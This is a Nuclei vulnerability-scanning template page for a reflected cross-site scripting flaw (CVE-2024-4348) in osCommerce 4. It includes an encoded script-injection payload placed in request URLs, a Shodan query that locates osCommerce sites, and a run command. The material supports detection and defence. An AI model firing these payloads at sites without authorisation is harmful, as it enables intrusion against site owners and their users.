Skip to content

osCommerce v4.0 - Cross-site Scripting

ID: CVE-2024-4348

Severity: medium

Author: s4e-io

Tags: packetstorm,xss,rxss,oscommerce,cve2024,cve

A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.

id: CVE-2024-4348
info:
name: osCommerce v4.0 - Cross-site Scripting
author: s4e-io
severity: medium
description: |
A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.
reference:
- https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-4348
- https://vuldb.com/?ctiid.262488
- https://vuldb.com/?id.262488
- https://vuldb.com/?submit.320855
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2024-4348
cwe-id: CWE-79
epss-score: 0.00065
epss-percentile: 0.28259
cpe: cpe:2.3:a:oscommerce:oscommerce:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: html:"osCommerce"
product: oscommerce
vendor: oscommerce
tags: packetstorm,xss,rxss,oscommerce,cve2024,cve
http:
- method: GET
path:
- "{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"
- "{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<ScRiPt>alert('document_domain')</ScRiPt>"
- "Listing of all products on the site"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100887a01bed55e107ed176ce3d2337065b06f19ed2baa1d71ee27615d2243842f1022100d3bdf1264768db3fbe62ce43fb577f7694cb6428046edfff4b9cfce8203175f4:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-4348.yaml"

View on Github